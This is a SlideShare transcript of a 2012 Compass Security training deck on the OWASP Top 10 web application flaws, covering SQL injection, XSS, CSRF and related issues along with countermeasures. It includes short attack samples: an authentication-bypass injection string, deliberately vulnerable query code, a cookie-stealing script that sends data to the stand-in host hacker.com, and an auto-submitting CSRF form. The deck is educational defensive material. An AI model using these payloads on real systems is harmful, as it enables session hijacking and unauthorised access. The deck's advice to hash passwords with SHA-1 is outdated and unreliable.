• Share
  • Email
  • Embed
  • Like
  • Private Content
Web app security - owasp top 10
 

Web app security - owasp top 10

on

  • 1,601 views

 

Statistics

Views

Total Views
1,601
Views on SlideShare
1,561
Embed Views
40

Actions

Likes
0
Downloads
44
Comments
0

2 Embeds 40

http://www.digicomp.ch 39
http://news.digicomp.ch 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Web app security - owasp top 10 Web app security - owasp top 10 Presentation Transcript

    • Web Application SecurityOWASP Top 10Digicomp Hacking Day 2012 Compass Security AG Tel.+41 55-214 41 60 Werkstrasse 20 Fax+41 55-214 41 61 Postfach 2038 team@csnc.ch CH-8646 Jona www.csnc.ch
    • OWASP TOP 10© Compass Security AG www.csnc.ch Seite 2
    • OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects and ForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport Layer Protection© Compass Security AG www.csnc.ch Seite 3
    • SQL Injection Compass Security AG Tel.+41 55-214 41 60 Werkstrasse 20 Fax+41 55-214 41 61 Postfach 2038 team@csnc.ch CH-8646 Jona www.csnc.ch
    • A1: SQL Injection Injection flaws occur when an application sends untrusteddata to an interpreter. Injection flaws are very prevalent, often found in SQL queries, LDAP queries, XPathqueries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing.© Compass Security AG www.csnc.ch Seite 5
    • IntroductionProtocols HTTPS RMI SQL© Compass Security AG www.csnc.ch Seite 6
    • SQL InjectionUser input is directly used to build SQL statements injects SQL String Hacker Application Malicious Query Quer select creditcard from y OR 1=1; Customers where user is ‘ibuetler’Modification of SQL query via browser© Compass Security AG www.csnc.ch Seite 7
    • SQL InjectionProtocols HTTPS + SQL Hacker Code RMI SQL© Compass Security AG www.csnc.ch Seite 8
    • Threat: Bypass Authentication dynamic concatenationAssembling Strings to SQL Queries of SQL string and parameters public boolean auth(String user, String pass) { boolean isAuthenticated = false; string sqlQueryString = "SELECT Username " + "FROM Users WHERE Username = " + user + " AND Password = " + pass + ""; int resultCount = perform(sqlQueryString) if (resultCount > 0) { return true; Checks if at least one } record exists. But the result must return false; contain 0 or one } result© Compass Security AG www.csnc.ch Seite 9
    • Threat: Bypass AuthenticationAttacker uses following input: Login: meier Password: OR = SELECT Username FROM Users WHERE Username=meier AND Password= OR =WHERE clause evaluates to TRUE All rows of table get select Result Set will not be empty!!!User gets authenticated!© Compass Security AG www.csnc.ch Seite 10
    • CountermeasuresA1: SQL Injection Compass Security AG Tel.+41 55-214 41 60 Werkstrasse 20 Fax+41 55-214 41 61 Postfach 2038 team@csnc.ch CH-8646 Jona www.csnc.ch
    • Secure ProgrammingSecure Programming Java Use Prepared Statements ADO.NET Use Parameters Collection DB-Level Stored Procedures (do not use dynamic SQL in SP!)© Compass Security AG www.csnc.ch Seite 12
    • Secure Programming (I) - Java Java Prepared Statements SQL statement gets precompiled at database Parameters are separate from the SQL statement Much faster when SQL statement is used several times Save against SQL injection attacks PreparedStatement updateSales = dbCon.prepareStatement("UPDATE COFFEES SET" + "SALES=? WHERE COF_NAME LIKE ?"); updateSales.setInt(1, 75); // correct updateSales.setString(2, "Colombian"); // usage updateSales.executeUpdate():© Compass Security AG www.csnc.ch Seite 13
    • Insecure - Secure Programming (III) But be aware. This Prepared Statement is still vulnerable to SQL injection! //Prepares the statement on the database PreparedStatement updateSales = dbCon.prepareStatement( "UPDATE COFFEES SET SALES=? WHERE COF_NAME " + "LIKE " + name + ""); // insecure usage //Sets the parameters for the statement updateSales.setString(1, req.getParameter("sale")); //Executes the statement updateSales.executeUpdate():© Compass Security AG www.csnc.ch Seite 14
    • OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects and ForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport Layer Protection© Compass Security AG www.csnc.ch Seite 15
    • A2: Cross Site Scripting XSS is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplieddata ina page sent to the browser without properly validating or escapingthat content.© Compass Security AG www.csnc.ch Seite 16
    • Attack VectorProtocol JavaScript from www.abc.com is loaded to the client (Malware) Attrackting!! Authentication into Web Application Session Hijacking (re-use client session)© Compass Security AG www.csnc.ch Seite 17
    • Java Script from Malware Site (1) Malware Site E-Bank Cookie between E-Bank and Browser Java Script from Malware Site IS GENERALLY DENIED to access the E-Bank cookie because of the SAME ORIGIN POLICY© Compass Security AG www.csnc.ch Seite 18
    • Java Script from Malware Site (2) Malware Site E-Bank Cookie between E-Bank and Browser <script src=http://Malware Site/m.js> Java Script from Malware Site IS ALLOWED to access the E- Bank cookie, if the Script is loaded from the E-Bank site (Origin) with <script src=>© Compass Security AG www.csnc.ch Seite 19
    • Cross-Site Scripting (XSS) Compass Security AG Tel.+41 55-214 41 60 Werkstrasse 20 Fax+41 55-214 41 61 Postfach 2038 team@csnc.ch CH-8646 Jona www.csnc.ch
    • Session Stealing SequenceMalicious JavaScript performs its own request Web Hacker Client Application POST /document.jsp?id=898& value=<script>location.href="http://hacker.com/"+document.cookie</script> Stores value in DB GET /app/document.jsp?id=898 Cookie: session=123 Response: <script>location.href="http://hacker.com/" +document.cookie</script> GET /session=123 Stores Request in Log File© Compass Security AG www.csnc.ch Seite 21
    • Reflected XSSWhat is reflected XSS? data provided by a web client is used immediately by server-side code to generate a page of results for that user. Attacker has to send a crafted link to the victim. Typical example: search form Attacker Victim Webserver sends link: http://example.com/search?<script>...</ script> GET /search?<script>...</script> search results for: <script>...</script> Script is executed© Compass Security AG www.csnc.ch Seite 22
    • Stored XSSWhat is stored XSS? data provided by a web client is stored in a database. This data is then presented to the user unencoded. Malicious script is rendered more than once. XSS worms are based on stored XSS vulnerabilities. Typical example: message board© Compass Security AG www.csnc.ch Seite 23
    • Recommendations Compass Security AG Tel.+41 55-214 41 60 Werkstrasse 20 Fax+41 55-214 41 61 Postfach 2038 team@csnc.ch CH-8646 Jona www.csnc.ch
    • XSS PreventionPossible solutions Convert output into HTML entities < &lt; > &gt; " &quot; &apos; Input validation on characters Do not accept "dangerous" characters (e.g. <) Delete "dangerous" characters from request Transform "dangerous" characters into HTML entities Input validation on strings / tags Do not accept "dangerous" tags (e.g. <script>) Delete "dangerous" tags from request Transform "dangerous" tags into HTML entities© Compass Security AG www.csnc.ch Seite 25
    • ESAPIOWASP Enterprise Security API (ESAPI)Available for all major programming languages Java .NET (work in progress) PHP (work in progress) Coldfusion (work in progress) ...Methods to prevent XSS Encoder.encodeForHTML(maliciousString); Encoder.encodeForHTMLAttribute(maliciousString); Encoder.encodeForJavascript(maliciousString); Encoder.encodeForVBScript(maliciousString);© Compass Security AG www.csnc.ch Seite 26
    • OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects and ForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport Layer Protection© Compass Security AG www.csnc.ch Seite 27
    • A3: Broken Authentication Developers frequently build custom authentication and session schemes, but building these correctly is hard. As a result, they frequently have flaws, usually in areas such as logout, password management, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.© Compass Security AG www.csnc.ch Seite 28
    • HTTP Authentication Mechanisms© Compass Security AG www.csnc.ch Seite 29
    • Strong Authentication SMS1) UN/PW2) OTP© Compass Security AG www.csnc.ch Seite 30
    • Client Certificate Auth© Compass Security AG www.csnc.ch Seite 31
    • Authentication StrengthFactors of Authentication (3 variants) To KNOW something Password, PIN To OWN something Smartcard, SecurId, Safeword, Vasco, OTP To BE something Fingerprint, Iris, Voice, FaceDefinition of “Strong authentication” Combination of at least 2 factors© Compass Security AG www.csnc.ch Seite 32
    • Authentication in Web ApplicationsBrowser Authentication Based on Response Headers (HTTP Protocol) HTTP Protocol BasicAuth DigestAuth NTML Auth Form-based Authentication (Application Login Application Login) POST: Submit Login Credentials in Post Body GET: Submit Login Credentials in URL SSL based Authentication (HTTPS Protocol HTTPS Protocol) Client CertificateAuthentication Schemes Direct Challenge/Response Second Channel (SMS, Tokens)© Compass Security AG www.csnc.ch Seite 33
    • Login Service Attacks Compass Security AG Tel.+41 55-214 41 60 Werkstrasse 20 Fax+41 55-214 41 61 Postfach 2038 team@csnc.ch CH-8646 Jona www.csnc.ch
    • User EnumerationVerbose login related error messages can lead to user enumeration “Password incorrect” “User unknown”Login error messages must be neutral “Username or Password incorrect”Critical dialogs Login Change password Lost password© Compass Security AG www.csnc.ch Seite 35
    • Session Handling Attacks Compass Security AG Tel.+41 55-214 41 60 Werkstrasse 20 Fax+41 55-214 41 61 Postfach 2038 team@csnc.ch CH-8646 Jona www.csnc.ch
    • Session FixationSpecial form of Victim Hacker WebApp session hijacking /index.html Session=123; Please use session=123 for WebappHacker tricks the victim to use a /index.html; Session=123 session known LoginForm to the hacker doLogin(UserCredentials) + session=123; Auth=Successfull! Authenticate();In example /protected/index.html + session=123; URL based /protected/index.html + session=123; session tracking is used© Compass Security AG www.csnc.ch Seite 37
    • OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects and ForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport Layer Protection© Compass Security AG www.csnc.ch Seite 38
    • A4: Insecure Direct Object References 1. For direct references to restricted resources, the application needs to verify the user is authorized to access the exact resource they have requested. 2. If the reference is an indirect reference, the mapping to the direct reference© Compass Security AG www.csnc.ch Seite 39
    • Security by ObscurityInsecure Admin Links Menu links as the only means of authorization Bypass with URL and parameter guessing possible Only partially implemented authorization Function authorization only© Compass Security AG www.csnc.ch Seite 40
    • Authorization “decentralized”Single functions must call authorization checks Request Request Function or Data Function Authorization or Data CheckThreats Call to the authorization module are easily forgotten Each function must be tested© Compass Security AG www.csnc.ch Seite 41
    • Authorization “centralized” Request RequestAuthorization must be implemented As centrally as possible As one module Authorization CheckAdvantages Less risk that implementation of authorization checks are Function Function forgotten or Data or Data Easier to testDisadvantages Data authorization often difficult to achieve© Compass Security AG www.csnc.ch Seite 42
    • OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects and ForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport Layer Protection© Compass Security AG www.csnc.ch Seite 43
    • A5: Cross Site Request Forgery The easiest way to check whether an application is vulnerable is to see if each link and form contains an unpredictable token for each user. Without such an unpredictable token, attackers can forge malicious requests. Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets.© Compass Security AG www.csnc.ch Seite 44
    • IntroductionCross Site Request Forgery has many names XSRF Session Riding One Click AttackXSRF != XSS XSS exploits the trust that a client has for the website/application Client trusts the website: All the javascript code is necessary to run the webapplication XSRF exploits the trust that a website has for the user. Website trusts the client: All requests made by the user are intended to be made© Compass Security AG www.csnc.ch Seite 45
    • Cross Site Request Forgery Malware Site E-Bank Cookie between E-Bank and Browser Java Script from Malware Site IS NOT ALLOWED to access the E-Bank cookie© Compass Security AG www.csnc.ch Seite 46
    • Cross Site Request Forgery<img src=http://bank/do_trade> Malware Site E-Bank Cookie between E-Bank and Browser <img src=> loads image from bank = this is allowed and performs the malicous transaction © Compass Security AG www.csnc.ch Seite 47
    • XSRF with GET MethodActions can be made by calling GET Requests (e.g. Order someitems) http://www.shop.com/controller?action=buy&productId=1&quantity= 23 © Compass Security AG www.csnc.ch Seite 48
    • XSRF with POST MethodActions can be made by calling POST Requests (e.g. Order some items) POST /controller Host: www.shop.com ..... action=buy&productId=1&quantity=23© Compass Security AG www.csnc.ch Seite 49
    • Malicious Hacker „POST“ FormPrepared Website from Hacker <body> <form action="http://www.shop.com/controller" method="POST"> <input type="hidden" name="action" value="buy"/> <input type="hidden" name="productId" value="1"/> <input type="hidden" name="quantity" value="23"/> </form> <script> document.forms[0].submit(); </script> </body>© Compass Security AG www.csnc.ch Seite 50
    • AssumptionsThe attacker knows the target website How do the requests look like?The victim has a valid session cookie If session handling is done in the URL, the website is not vulnerable to this kind of attack.© Compass Security AG www.csnc.ch Seite 51
    • RemediationForm contains hidden field with random token.Executing the request will send the hidden-field-token to the server.Server now checks if the hidden-field-token is valid, if not: the request is cancelledOnly allowing POST Requests is no solution Hidden form Javascript: form.submit()In other words: Websites should embed fresh nonce in every form, check for it on every request Forged requests will have cookie, but not the nonce© Compass Security AG www.csnc.ch Seite 52
    • Order after Remediation Victim Webshop Login Cookie = 123 GET /order_form.htm _ Cookie=123 Generate random token and embed order_form.htm in form as hidden <input type=“hidden“ name=“token“ value=“uiwe4qi4“> field GET /controller?action=buy&token=uiwe4qi4&... Cookie=123 Check token Order successful© Compass Security AG www.csnc.ch Seite 53
    • Order after Remediation© Compass Security AG www.csnc.ch Seite 54
    • OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects and ForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport Layer Protection© Compass Security AG www.csnc.ch Seite 55
    • A6: Security Misconfiguration Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Developers and network administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts, unnecessary services, etc.© Compass Security AG www.csnc.ch Seite 56
    • Examples of Misconfigurations Do you have a process for keeping current on the latest versions and patches to all the software in your environment? This includes the OS, Web/App Server, DBMS, applications, and any libraries. Is everything unnecessary disabled, removed, or not installed (e.g., ports, services, pages, accounts)? Are default account passwords changed or disabled? Are all other security settings configured properly. Are all servers protected by Firewalls / Filters … etc. A concerted, repeatable process is required to develop and maintain a proper security configuration.© Compass Security AG www.csnc.ch Seite 57
    • Examples of MisconfigurationsExamples of Glocken-Shop Misconfigurations XML Injection -> /etc/passwd & /etc/shadow Directory Browsing of glocken.hacking-lab.com/logs/ Tomcat Service runs with „root“ privileges© Compass Security AG www.csnc.ch Seite 58
    • OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects and ForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport Layer Protection© Compass Security AG www.csnc.ch Seite 59
    • A7: Failure to restrict URL Access Applications are not always protecting page requests properly. Sometimes, URL protection is managed via configuration, and the system is misconfigured. Sometimes, developers must include the proper code checks, and they forget. Detecting such flaws is easy. The hardest part is identifying which pages (URLs) exist to attack.© Compass Security AG www.csnc.ch Seite 60
    • IntroductionFailure to restrict URL access Privilege Escalation from anonymous to registered user Privilege Escalation from registered to admin userExamples of URL‘s http://example.com/app/getappInfo http://example.com/app/admin_getappInfoExploit If an authenticated, non-admin, user is allowed to access the “admin_getappInfo”page, this is a flaw, and may lead the attacker to more improperly protected admin pages.© Compass Security AG www.csnc.ch Seite 61
    • OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects and ForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport Layer Protection© Compass Security AG www.csnc.ch Seite 62
    • Unvalidated Redirects and Forwards Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass.© Compass Security AG www.csnc.ch Seite 63
    • OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects and ForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport Layer Protection© Compass Security AG www.csnc.ch Seite 64
    • Insecure Cryptographic Storage The most common flaw in this area is simply not encrypting data that deserves encryption. When encryption is employed, unsafe key generation and storage, not rotating keys, and weak algorithm usage is common. Use of weak and unsalted hashes to protect passwords is also common. External attackers have difficulty detecting such flaws due to limited access.© Compass Security AG www.csnc.ch Seite 65
    • Hashed and Salted User PasswordsDo not store passwords in plain-text to the table!!Example: table with user accounts & plaintext password pose a high security risk! mysql> select username, password from users; +----------+----------+ | username | password | +----------+----------+ | hacker10 | compass | | hacker11 | compass | ...If possible: One-way-hashed and salted passwords using hash algorithms like SHA-1 (Do not use MD5 anymore)© Compass Security AG www.csnc.ch Seite 66
    • OWASP Top 10 (RC1 2010)A1 SQL InjectionA2 Cross Site ScriptingA3 Broken Auth & Session ManagementA4 Insecure Direct Object ReferenceA5 Cross Site Request ForgeryA6 Security MisconfigurationA7 Failure to Restrict URL AccessA8 Unvalidated Redirects and ForwardsA9 Insecure Cryptographic StorageA10 Insufficient Transport Layer Protection© Compass Security AG www.csnc.ch Seite 67
    • Insufficient Transport Layer Protection Applications frequently do not properly protect network traffic. Usually, they use SSL/TLS during authentication, but not elsewhere, exposing all transmitted data as well as session IDs to interception. Applications sometimes use expired or improperly configured certificates as well. Detecting such flaws is easy. Just observe the site’s network traffic.© Compass Security AG www.csnc.ch Seite 68
    • MitigationUse SSL + TLS Set-Cookie: A=B; secure; HttpOnlyReverse Proxy Entry Server Reverse Proxy Secure Gateway© Compass Security AG www.csnc.ch Seite 69